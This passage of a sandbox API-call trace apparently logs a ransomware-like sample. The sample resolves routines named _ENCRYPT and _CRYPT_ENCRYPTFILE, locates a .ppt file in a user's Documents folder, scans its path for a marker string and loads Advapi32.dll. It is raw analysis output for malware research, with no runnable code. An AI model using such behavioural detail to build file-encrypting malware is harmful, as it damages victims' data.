lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0171.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0171.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0171.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0171.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0171.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0171.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0171.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0171.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0171.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0171.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0171.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0171.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0171.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0171.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0171.946] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0171.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0171.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0171.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0171.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0171.946] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0171.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0171.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0171.946] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0171.946] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0171.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0171.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0171.946] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0171.946] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0171.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0171.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0171.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0171.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0171.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0171.947] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0171.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0171.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0171.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0171.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0171.947] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.947] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.947] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6f89b0, ftCreationTime.dwHighDateTime=0x1d5e748, ftLastAccessTime.dwLowDateTime=0xd1d81f90, ftLastAccessTime.dwHighDateTime=0x1d5d846, ftLastWriteTime.dwLowDateTime=0xd1d81f90, ftLastWriteTime.dwHighDateTime=0x1d5d846, nFileSizeHigh=0x0, nFileSizeLow=0x6db5, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="gVll7Y--hWx_Sucb_5p.ppt", cAlternateFileName="GVLL7Y~1.PPT")) returned 0x90add8 [0171.948] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0171.949] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.949] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6f89b0, ftCreationTime.dwHighDateTime=0x1d5e748, ftLastAccessTime.dwLowDateTime=0xd1d81f90, ftLastAccessTime.dwHighDateTime=0x1d5d846, ftLastWriteTime.dwLowDateTime=0xd1d81f90, ftLastWriteTime.dwHighDateTime=0x1d5d846, nFileSizeHigh=0x0, nFileSizeLow=0x6db5, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="gVll7Y--hWx_Sucb_5p.ppt", cAlternateFileName="GVLL7Y~1.PPT")) returned 0x90add8 [0171.949] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0171.949] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.949] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="biNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hHcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HcjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cjLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jLML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ML\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gVll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ll7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="--hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hWx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Wx_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Sucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ucb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cb_5p.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.954] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.954] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0171.954] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0171.954] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0171.954] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.955] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.955] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.955] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.955] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.955] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6f89b0, ftCreationTime.dwHighDateTime=0x1d5e748, ftLastAccessTime.dwLowDateTime=0xd1d81f90, ftLastAccessTime.dwHighDateTime=0x1d5d846, ftLastWriteTime.dwLowDateTime=0xd1d81f90, ftLastWriteTime.dwHighDateTime=0x1d5d846, nFileSizeHigh=0x0, nFileSizeLow=0x6db5, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="gVll7Y--hWx_Sucb_5p.ppt", cAlternateFileName="GVLL7Y~1.PPT")) returned 0x90af58 [0171.955] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0171.955] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.955] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0171.955] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.955] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.956] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0171.956] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.956] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0171.956] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.956] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 